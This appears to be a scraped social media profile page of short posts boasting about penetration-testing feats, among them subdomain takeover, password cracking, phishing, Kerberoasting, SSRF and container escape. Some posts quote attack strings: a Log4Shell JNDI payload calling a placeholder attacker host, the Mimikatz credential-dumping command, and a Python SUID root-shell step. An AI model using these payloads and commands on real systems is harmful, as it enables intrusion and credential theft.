@xHackInSeconds profile picture
xHackInSeconds @xHackInSeconds

Real hacking. Real tools. Real commands.

Joined September 2019
  • Tweets 221
  • Following 256
  • Followers 45
209 Photos and videos
I took over their subdomain. Dangling CNAME to a deleted S3 bucket. Now it serves my content. #hacking #cybersecurity #bugbounty
0:15
14
12 admin accounts cracked. 3 of them used 'password' as the base word. In 2026. We deserve to get hacked. #infosec #hashcat #pentesting
0:15
11
Any domain user can request a service ticket. That ticket is encrypted with the service account's hash. Hashcat does the rest. #infosec #kerberoast
0:15
8
I phished 500 employees with one email. 73% opened it. 312 entered their passwords. Social engineering at scale. #hacking #cybersecurity
0:15
8
The payment table had 8,291 records too. One parameter was all it took to dump everything. Validate your inputs. #cybersecurity #appsec #sqlinjection
0:15
1
1
58
${jndi:ldap://attacker/exploit}. That's it. That's the entire payload. The server called my LDAP and executed my class. #infosec #log4shell
0:15
19
I stole every credential from Windows memory. Mimikatz. One command. 47 passwords in plaintext. #hacking #cybersecurity #mimikatz
0:15
24
The SIEM had 50 rules for HTTP exfil. Zero for DNS. I pushed 847 database records through TXT queries. Nobody noticed for 3 weeks. #hacking #threatintel
0:15
41
Most pentest reports say 'SQL injection possible' and sit in P3 forever. Pentevo ships findings with the actual response body. No damage proof, no finding. CISOs: of your last 10 critical findings, how many had real proof-of-impact? #ciso #cybersecurity
0:41
1
81
subfinder found 847 subdomains. 3 had dangling CNAMEs. I claimed one and it now serves my page under their domain. #infosec #recon
0:15
16
I went from guest to root in 60 seconds. One misconfigured SUID binary. Game over. #hacking #cybersecurity #linux
0:15
38
The web app fetched URLs for image previews. I pointed it at the metadata endpoint. Got temp creds. Downloaded everything. #hacking #cloudsecurity
0:15
16
GoPhish fake password reset valid SSL cert. 4 hours later: 312 passwords harvested. 14 C-suite execs among them. #infosec #phishing
0:15
2
32
I captured 47 NTLM hashes just by listening on the network. No exploits. No brute force. Just Responder. #hacking #cybersecurity
0:15
22
Free WiFi isn't free. One laptop. One WiFi adapter. A fake access point. 14 sets of credentials captured in 45 minutes. #hacking #awareness
0:15
34
sekurlsa::logonpasswords. 47 credentials from LSASS. Domain admin. SQL service account. Backup service. All in plaintext. #infosec #windows
0:15
9
I got a reverse shell with one command. Full root access. They never saw the connection. #hacking #cybersecurity #pentesting
0:15
1
58
Container escape to host root. The Docker socket was mounted inside the container. I spawned a new privileged container and broke out. #hacking #docker
0:15
30
Python3 had the SUID bit set. import os. setuid(0). Root shell. SSH keys to 8 more servers. Total compromise. #pentesting #privesc
0:15
1
16
I cracked 10,000 passwords in 30 seconds. One GPU. One wordlist. MD5 never stood a chance. #hacking #cybersecurity #hashcat
0:15
1
1
42
Load more